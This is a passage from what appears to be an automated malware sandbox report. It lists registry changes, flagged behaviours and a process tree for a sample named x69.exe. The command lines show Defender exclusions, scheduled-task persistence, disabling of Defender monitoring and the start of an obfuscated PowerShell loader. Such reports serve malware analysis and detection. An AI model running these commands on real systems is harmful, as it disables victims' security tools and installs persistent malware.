| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-c4-75-2d-b8-0a\WpadDecisionReason = "1" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\NodeSlot = "3" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 | C:\Windows\Explorer.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\system32\reg.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5000310000000000995a4d6f100041646d696e003c0009000400efbe995af166b45a8f212e000000d20501000000040000000000000000000000000000005efbe900410064006d0069006e00000014000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 7800310000000000995af1661100557365727300640009000400efbe874f7748b45a8f212e000000fd0100000000010000000000000000003a00000000000ba6c40055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 | C:\Windows\Explorer.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\NodeSlot = "2" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe110000009a627c54e1b5db01a46ba08b3dc9db01ee4eef8b3dc9db0114000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 5600310000000000b45ab12110005443505669657700400009000400efbeb45ab021b45ab1212e00000050820200000009000000000000000000000000000000c20015015400430050005600690065007700000016000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 19002f433a5c000000000000000000000000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 8400310000000000b45aac211100444f574e4c4f7e3100006c0009000400efbe995af166b45aac212e000000f3050100000002000000000000000000420000000000354c660044006f0077006e006c006f00610064007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370039003800000018000000 | C:\Windows\Explorer.EXE | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\TCPView.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\TCPView\tcpview64.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\TCPView\tcpview64.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\TCPView\tcpview64.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\x69.exe
"C:\Users\Admin\AppData\Local\Temp\x69.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'
C:\Users\Admin\AppData\Roaming\x69.exe
C:\Users\Admin\AppData\Roaming\x69.exe
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
"C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\71A6.tmp\71A7.tmp\71A8.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7271.tmp\7272.tmp\7273.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69install.exe
C:\Users\Admin\AppData\Roaming\x69install.exe
"C:\Users\Admin\AppData\Roaming\x69install.exe"
C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
C:\Users\Admin\AppData\Roaming\x69install.exe
C:\Users\Admin\AppData\Roaming\x69install.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:ZnUQyXlWTWsj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SfOXcgckuEyuGt,[Parameter(Position=1)][Type]$UTUpuZnLwH)$qUHKBJxSYNY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+'le'+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'T'+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+'e'+''+[Char](100)+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+'ss'+[Char](44)+'A'+'u'+''+'t'+''+[Char](111)+'C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qUHKBJxSYNY.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+''+'e'+'cia'+[Char](108)+''+'N'+''+[Char](97)+'me,'+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+','+'P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$SfOXcgckuEyuGt).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$qUHKBJxSYNY.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+'y'+''+'S'+'i'+'g'+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$UTUpuZnLwH,$SfOXcgckuEyuGt).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+[Char](101)+'d');Write-Output $qUHKBJxSYNY.CreateType();}$TZAEQWjGXDmSs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+'o'+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+'i'+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+'a'+[Char](102)+'e'+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+''+[Char](101)+'M'+'e'+''+'t'+''+[Char](104)+''+[Char](111)+'d'+'s'+'');$KybpxFYdMHuPhT=$TZAEQWjGXDmSs.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+'dr'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+','+'S'+'t'+'a'+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TLljcKwpGUOLINyQcAm=ZnUQyXlWTWsj @([String])([IntPtr]);$aZjbOxNcdAXjGuztqCtRKd=ZnUQyXlWTWsj 